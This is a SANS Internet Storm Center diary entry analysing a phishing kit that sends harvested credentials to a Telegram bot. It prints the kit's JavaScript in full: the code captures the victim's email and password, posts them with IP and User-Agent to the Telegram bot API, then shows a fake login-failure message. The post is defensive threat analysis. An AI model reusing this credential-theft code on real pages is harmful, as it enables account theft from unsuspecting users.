Phishing kits are not new, they are plenty in the wild, and my honeypot collects many samples daily. Usually, a phishing kit will collect credentials and send them to a compromised server (WordPress is generally an excellent target to host this kind of malicious code). Later, I found many kits that (ab)use online services to receive data submitted via HTTP forms[1].
Today, I spotted a phishing campaign that stores collected credentials via a Telegram bot! Telegram bots are common in malicious Python scripts but less common in Phishing campaigns! The fake login page is pretty simple:
Everything happens through a piece of JavaScript code:
document.getElementById("submitBtn").addEventListener("click", function(e) {
e.preventDefault();
var pswd = document.getElementById('password').value;
if (pswd == null || pswd == ""){
document.getElementById('msg').innerHTML = `
Your account password cannot be empty. if you don't remember your password, reset it now.
`;
setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);}
else if(pswd.length < 5){
document.getElementById('msg').innerHTML = '
Your account password is too short.
';
setTimeout(() => {document.getElementById('msg').innerHTML = ''; document.getElementById("submitBtn").reset();}, 3000);
} else {
var IP = document.getElementById('gfg').textContent;
var message = `====== Office Excel ======rnEmail: ${email}rnPassword: ${pswd}rnIP: https://ip-api.com/${IP}rnUser-Agent: ${navigator.userAgent}rn===================`;
var settings = {
"async": true, "crossDomain": true, "url": "https://api.telegram.org/bot" + token + "/sendMessage",
"method": "POST", "headers": {"Content-Type": "application/json", "cache-control": "no-cache"},
"data": JSON.stringify({"chat_id": chat_id, "text": message})}
$.ajax(settings).done((response) => {
document.getElementById("password").value ="";
document.getElementById('msg').innerHTML = `
Your account or password is incorrect. if you don't remember your password, reset it now.
`;
setTimeout(() => {document.getElementById('msg').innerHTML = '';}, 3000);
});
}
});
If the victim provides a password, interesting data are posted to a Telegram bot (credentials, IP, User-Agent) via a simple HTTP request built in JavaScript. However, the script has a big issue. A token is required to “talk” to the Telegram bot (see in red above). But, the token was not defined in the script, making it unusable! Yes, attackers make mistakes too!
[Note] This technique is not new, and was already covered in another diariy by Johannes[2] but the code is different here and the big mistake is funny!
[1] https://isc.sans.edu/diary/InfoStealer+Using+webhooksite+to+Exfiltrate+Data/28088
[2] https://isc.sans.edu/diary/Simple+HTML+Phishing+via+Telegram+Bot/29528
Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
